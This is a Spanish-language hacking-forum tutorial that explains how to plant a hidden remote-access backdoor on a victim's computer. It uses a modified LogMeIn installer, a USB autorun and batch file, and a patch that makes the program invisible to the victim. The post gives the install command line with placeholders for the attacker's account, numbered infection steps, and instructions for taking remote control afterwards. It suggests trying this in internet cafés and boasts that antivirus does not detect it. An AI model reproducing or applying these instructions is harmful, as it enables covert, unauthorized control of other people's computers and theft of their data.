Hola gente, como veo que el foro esta un poco parado, voy a ver si puedo hacer algun que otro manual, para mantener algo de ritmo en el foro....
antes que nada, no estaba seguro si poner este post en hack basico o en avanzado, pero creo que encaja mas en basico.
Bueno, logmein, es un programa de escritorio virtual como VNC, solo que funciona a travez del puerto 80.
es desir... no tiene barreras, ni antivirus que lo detecte.
te podes conectar a cualquier ordenador, no importa detras de cuantos routers o switchs este, ni de si tiene ip privada o publica. es lo mismo.
vamos a aprender a "hackear" con logmein. (en realidad es para aprender, para poder usar verdaderos troyanos el dia de mañana.)
OK, la idea es la siguiente, vamos a tener varias formas de infectar el ordenador de la victima, pero esta vez, vamos a suponer que tenemos acceso fisico al ordenador. (ideal para probar en sus casas, o en cibers.... despues de desactivar el deep freeze jaja)
la infeccion la vamos a hacer con una inyeccion usb, si tenes xp. Si tenes vista, bueno, vas a tener que hacer doble click en el archivo jajjajaj..
yo ya prepare todo para una inyeccion rapida con un archivo batch
todo lo que necesitas es un pendrive para llevar los archivos
en el archivo rar, estan los siguientes archivos:
ejecutar.bat --> este es el archivo que tenes que ejecutar para que comienze la instalacion
LMI_Backdoor_by_lordblacksuca.msi --> este es el instalador de Logmein modificado por mi.
autorun.inf --> Autorun, esto es para hacer la inyeccion usb
logmein-patch.exe --> este parche reempla 2 dll, del programa y lo hace totalmente invisible para la victima.
bueno, el procedimiento es el siguiente:
antes que nada, tenes que tener una cuenta en logmein. www.logmein.com es gratis para crear la cuenta.
Hay un post en el foro, que lo explica, por eso no lo detallo.
despues:
1). Descargar el archivo y extraerlos en el root de un pendrive.
2). ahora, tienes que editar el archivo ejecutar.bat con tus datos. Lo tenes que abrir con el notepad, y editar la linea que dice:
LMI_Backdoor_by_Lordblacksuca.msi /qr USERPASSWORD=contraseña USERVERIFYPWD=contraseña USEREMAIL=tu-email@email.com USERWEBPASSWORD=contraseñadelaweb LicenseType=free
en donde dice "contraseña" es la contraseña del ordenardor, las 2 tienen que ser iguales, eso lo pones a tu gusto.
donde dice
tu-email@email.com y contraseñadelweb tenes que poner tus datos de conexion de logmein.
3) si tu victima tiene windows xp, solo tenes que enchufar el pendrive y listo! se inicia una consola MS-DOS y ahi te va diciendo los pasos que va haciendo... demora aproximadamente 30 segundos. (dependiendo la maquina)
si tu victima no tiene xp, simplemente ejecutas el archivo ejecutar.bat
solo eso!!!
ahora para controlar la maquina de tu victima, entras en la web de logmein www.logmein.com pones tu email y contraseña seleccionas el ordenador, y le haces click en control remoto.
cualquier duda pregunta, no tengo problemas en responder.
a esto lo he diseñado yo, lordblacksuca, para dhackers.com.
saludos!
En un post reciente de ziion2000 vi unos downloaders, que pueden ser usados, para hacer un server de 5kb, en vez de los 10 Mb que ocupa este.